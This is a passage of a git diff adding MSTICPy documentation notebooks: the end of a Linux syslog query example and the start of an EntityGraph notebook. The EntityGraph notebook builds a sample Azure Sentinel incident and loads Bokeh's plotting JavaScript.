+       "1  UbuntuDevEnv 2019-07-25 15:15:37  authpriv  UbuntuDevEnv          info   \n",
+       "2  UbuntuDevEnv 2019-07-25 15:15:37  authpriv  UbuntuDevEnv          info   \n",
+       "3  UbuntuDevEnv 2019-07-25 15:15:50  authpriv  UbuntuDevEnv          info   \n",
+       "4  UbuntuDevEnv 2019-07-25 15:16:01  authpriv  UbuntuDevEnv          info   \n",
+       "\n",
+       "                                       SyslogMessage  ProcessID    HostIP  \\\n",
+       "0  omsagent : TTY=unknown   PWD=/opt/microsoft/om...        NaN  10.0.1.4   \n",
+       "1  pam_unix(sudo:session): session opened for use...        NaN  10.0.1.4   \n",
+       "2  pam_unix(sudo:session): session closed for use...        NaN  10.0.1.4   \n",
+       "3  pam_unix(cron:session): session closed for use...    29486.0  10.0.1.4   \n",
+       "4  pam_unix(cron:session): session opened for use...    29844.0  10.0.1.4   \n",
+       "\n",
+       "  ProcessName                                    MG    Type  \\\n",
+       "0        sudo  00000000-0000-0000-0000-000000000002  Syslog   \n",
+       "1        sudo  00000000-0000-0000-0000-000000000002  Syslog   \n",
+       "2        sudo  00000000-0000-0000-0000-000000000002  Syslog   \n",
+       "3        CRON  00000000-0000-0000-0000-000000000002  Syslog   \n",
+       "4        CRON  00000000-0000-0000-0000-000000000002  Syslog   \n",
+       "\n",
+       "                                         _ResourceId  \n",
+       "0  /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  \n",
+       "1  /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  \n",
+       "2  /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  \n",
+       "3  /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  \n",
+       "4  /subscriptions/3b701f84-d04b-4479-89b1-fa8827e...  "
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "qry_prov.LinuxSyslog.syslog_example(start='2019-07-21 23:43:18.274492', end='2019-07-27 23:43:18.274492', host_name='UbuntuDevEnv')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "If you are having difficulties with a defined query and it is not producing the expected results it can be useful to see the raw query exactly as it is passed to the Data Environment. If you call a query with 'print' and the parameters required by that query it will construct and print out the query string to be run. "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "' Syslog | where true | where TimeGenerated >= datetime(2019-07-21 23:43:18.274492) | where TimeGenerated <= datetime(2019-07-27 23:43:18.274492) | where Computer == \"UbuntuDevEnv\" | take 5'"
+      ]
+     },
+     "execution_count": 25,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "qry_prov.LinuxSyslog.syslog_example('print', start='2019-07-21 23:43:18.274492', end='2019-07-27 23:43:18.274492', host_name='UbuntuDevEnv')"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/EntityGraph.ipynb b/docs/notebooks/EntityGraph.ipynb
new file mode 100644
index 000000000..5f0a64b67
--- /dev/null
+++ b/docs/notebooks/EntityGraph.ipynb
@@ -0,0 +1,1631 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Entity Graph\n",
+    "============\n",
+    "\n",
+    "This notebook demonstrates the use of the MSTICPy entity graph visualization built using the [Bokeh library](https://bokeh.pydata.org) and [NetworkX](https://networkx.org/).\n",
+    "\n",
+    "You must have msticpy installed:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "Often when investigating an incident you will want to keep track of the key events and entities that appear in the investigation, along with the key relationships between them. An effective way to do this is to create a graph of the key entities that represents those entities and thier connections.\n",
+    "\n",
+    "The `EntitiyGraph` feature has been created to allow a user to create a graph of Incidents, Alerts, and other entities during the course of an investigation in order to keep track of an visualize these interactions.\n",
+    "A graph can be initially created using either an Alert, Incident, SecurityIncident or other entity type, with additional entities, links between these entities, and notes added as an investigation progresses.\n",
+    "As well as creating a graph object this feature allows for the plotting of the graph, allowing for interactive exploration of the entities and their links.\n",
+    "\n",
+    "<div class=\"alert alert-block alert-info\">\n",
+    "<b>Note:</b> This feature provides similar functionality to `msticpy.nbtools.security_alert_graph`, however it is expanded to include support for additional entity types and incidents.\n",
+    "You can pass `EntityGraph` a SecurtyAlert in the same way you can with security_alert_graph and will produce a very similar graph.\n",
+    "</div>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<hr><h4>Starting Notebook initialization...</h4>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "msticpy version installed: 1.4.4 latest published: 1.4.4<br>Latest version is installed.<br> <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Processing imports.... <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Imported: pd (pandas), IPython.get_ipython, IPython.display.display, IPython.display.HTML, IPython.display.Markdown, widgets (ipywidgets), pathlib.Path, plt (matplotlib.pyplot), matplotlib.MatplotlibDeprecationWarning, sns (seaborn), np (numpy), msticpy, msticpy.data.QueryProvider, msticpy.nbtools.foliummap.FoliumMap, msticpy.common.utility.md, msticpy.common.utility.md_warn, msticpy.common.wsconfig.WorkspaceConfig, msticpy.datamodel.pivot.Pivot, msticpy.datamodel.entities, msticpy.vis.mp_pandas_plot <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Checking configuration.... <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Azure CLI not detected. AzCLI single sign-on disabled ({_CLI_WIKI_MSSG_SHORT}) <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "Setting notebook options.... <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       " <br>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h4>Notebook initialization complete</h4>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "from msticpy.common.utility import check_py_version\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "check_py_version(MIN_REQ_PYTHON)\n",
+    "\n",
+    "import pandas as pd\n",
+    "\n",
+    "from msticpy import init_notebook\n",
+    "init_notebook(globals())\n",
+    "from msticpy.datamodel.entities.soc.incident import Incident\n",
+    "from msticpy.datamodel.entities.alert import Alert\n",
+    "from msticpy.datamodel.entities.url import Url\n",
+    "from msticpy.nbtools.security_alert import SecurityAlert\n",
+    "from msticpy.vis.entity_graph_tools import EntityGraph\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Creating an Incident object to plot"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<h3>incident</h3>{&nbsp;'AdditionalData':&nbsp;{&nbsp;'Alert&nbsp;Count':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Bookmarks&nbsp;Count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Comments&nbsp;Count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Incident&nbsp;Number':&nbsp;123,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Products':&nbsp;['Azure&nbsp;Sentinel'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Related&nbsp;Rule&nbsp;IDs':&nbsp;['123'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Tactics':&nbsp;['PrivilegeEscalation']},<br>&nbsp;&nbsp;'Alerts':&nbsp;[&nbsp;Alert(DisplayName=User&nbsp;Added&nbsp;to&nbsp;Priviledged&nbsp;Group&nbsp;in&nbsp;CONTOSO&nbsp;Domain,&nbsp;SystemAlertIds=['...)],<br>&nbsp;&nbsp;'DisplayName':&nbsp;'Sample&nbsp;Incident',<br>&nbsp;&nbsp;'EndTime':&nbsp;'2021-09-22T14:39:24.04Z',<br>&nbsp;&nbsp;'Entities':&nbsp;[&nbsp;Host(DnsDomain=demo.contoso.com,&nbsp;HostName=demo,&nbsp;NetBiosName=demo,&nbsp;OSFamily=OSFamily.W...),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Account(DisplayName=CONTOSO\\auser,&nbsp;Type=account)],<br>&nbsp;&nbsp;'IncidentID':&nbsp;'123',<br>&nbsp;&nbsp;'Labels':&nbsp;[{'labelName':&nbsp;'Tests&nbsp;Label',&nbsp;'labelType':&nbsp;'User'}],<br>&nbsp;&nbsp;'Owner':&nbsp;{&nbsp;'Email':&nbsp;'user@contoso.com',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'ID':&nbsp;'0a70480d-b1cd-4466-9b75-3814e34579eb',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Name':&nbsp;'A&nbsp;User',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'UPN':&nbsp;'user@contoso.com'},<br>&nbsp;&nbsp;'Severity':&nbsp;'Medium',<br>&nbsp;&nbsp;'StartTime':&nbsp;'2021-09-22T14:39:24.04Z',<br>&nbsp;&nbsp;'Status':&nbsp;'Active',<br>&nbsp;&nbsp;'TimeGenerated':&nbsp;'2021-09-22T15:09:09.2786667Z',<br>&nbsp;&nbsp;'Type':&nbsp;'incident',<br>&nbsp;&nbsp;'edges':&nbsp;set()}"
+      ],
+      "text/plain": [
+       "Incident(TimeGenerated=2021-09-22T15:09:09.2786667Z, DisplayName=Sample Incident, Inciden...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "inc = {\n",
+    "    \"id\": \"123\",\n",
+    "    \"name\": \"135a072e-77c3-4293-8c9a-7fdd53b5d620\",\n",
+    "    \"etag\": '\"d4fce673-dd4b-4d22-a39f-bda55d6079f3\"',\n",
+    "    \"type\": \"Microsoft.SecurityInsights/Incidents\",\n",
+    "    \"properties.title\": \"Sample Incident\",\n",
+    "    \"properties.description\": \"This is a sample incident to support unit tests\",\n",
+    "    \"properties.severity\": \"Medium\",\n",
+    "    \"properties.status\": \"Active\",\n",
+    "    \"properties.owner.objectId\": \"0a70480d-b1cd-4466-9b75-3814e34579eb\",\n",
+    "    \"properties.owner.email\": \"user@contoso.com\",\n",
+    "    \"properties.owner.assignedTo\": \"A User\",\n",
+    "    \"properties.owner.userPrincipalName\": \"user@contoso.com\",\n",
+    "    \"properties.labels\": [{\"labelName\": \"Tests Label\", \"labelType\": \"User\"}],\n",
+    "    \"properties.firstActivityTimeUtc\": \"2021-09-22T14:39:24.04Z\",\n",
+    "    \"properties.lastActivityTimeUtc\": \"2021-09-22T14:39:24.04Z\",\n",
+    "    \"properties.lastModifiedTimeUtc\": \"2021-09-22T15:09:34.376619Z\",\n",
+    "    \"properties.createdTimeUtc\": \"2021-09-22T15:09:09.2786667Z\",\n",
+    "    \"properties.incidentNumber\": 123,\n",
+    "    \"properties.additionalData.alertsCount\": 1,\n",
+    "    \"properties.additionalData.bookmarksCount\": 0,\n",
+    "    \"properties.additionalData.commentsCount\": 0,\n",
+    "    \"properties.additionalData.alertProductNames\": [\"Azure Sentinel\"],\n",
+    "    \"properties.additionalData.tactics\": [\"PrivilegeEscalation\"],\n",
+    "    \"properties.relatedAnalyticRuleIds\": [\"123\"],\n",
+    "    \"properties.incidentUrl\": \"https://portal.azure.com/#asset/Microsoft_Azure_Security_Insights/Incident/subscriptions/\",\n",
+    "    \"Entities\": [\n",
+    "        (\n",
+    "            \"Host\",\n",
+    "            {\n",
+    "                \"dnsDomain\": \"demo.contoso.com\",\n",
+    "                \"hostName\": \"demo\",\n",
+    "                \"omsAgentID\": \"ce7903cf-2d8f-47e9-a338-2259f02a9779\",\n",
+    "                \"osFamily\": \"Windows\",\n",
+    "                \"osVersion\": \"10\",\n",
+    "                \"additionalData\": {\n",
+    "                    \"DataSource\": \"SecurityEvent\",\n",
+    "                    \"AzureResourceId\": \"/subscriptions/ce7903cf-2d8f-47e9-a338-2259f02a9779/resourcegroups/test/providers/microsoft.compute/virtualmachines/demo\",\n",
+    "                    \"SubscriptionId\": \"ce7903cf-2d8f-47e9-a338-2259f02a9779\",\n",
+    "                    \"ResourceId\": \"/subscriptions/ce7903cf-2d8f-47e9-a338-2259f02a9779/resourceGroups/test/providers/Microsoft.Compute/virtualMachines/demo\",\n",
+    "                    \"VMUUID\": \"ce7903cf-2d8f-47e9-a338-2259f02a9779\",\n",
+    "                    \"ShouldResolveIp\": \"False\",\n",
+    "                },\n",
+    "                \"friendlyName\": \"demo\",\n",
+    "            },\n",
+    "        ),\n",
+    "        (\n",
+    "            \"Account\",\n",
+    "            {\n",
+    "                \"accountName\": \"auser\",\n",
+    "                \"displayName\": \"CONTOSO\\\\auser\",\n",
+    "                \"friendlyName\": \"CONTOSO\\\\auser\",\n",
+    "            },\n",
+    "        ),\n",
+    "    ],\n",
+    "    \"Alerts\": [\n",
+    "        {\n",
+    "            \"ID\": \"8b7d06d8-dbae-4b23-87ed-1a27b75437d5\",\n",
+    "            \"Name\": \"User Added to Priviledged Group in CONTOSO Domain\",\n",
+    "            \"Entities\": None,\n",
+    "        }\n",
+    "    ],\n",
+    "    \"Type\": \"incident\",\n",
+    "}\n",
+    "\n",
+    "incident = Incident(inc)\n",
+    "display(incident)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Basic graph creation and plotting with an Incident\n",
+    "Creating a graph is as simple as instantiating an `EntityGraph` object and passing it a incident object.  \n",
+    "To display the graph as a visualization can be achieved by calling the `plot` method."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1002\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1002\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1002\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1003\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = 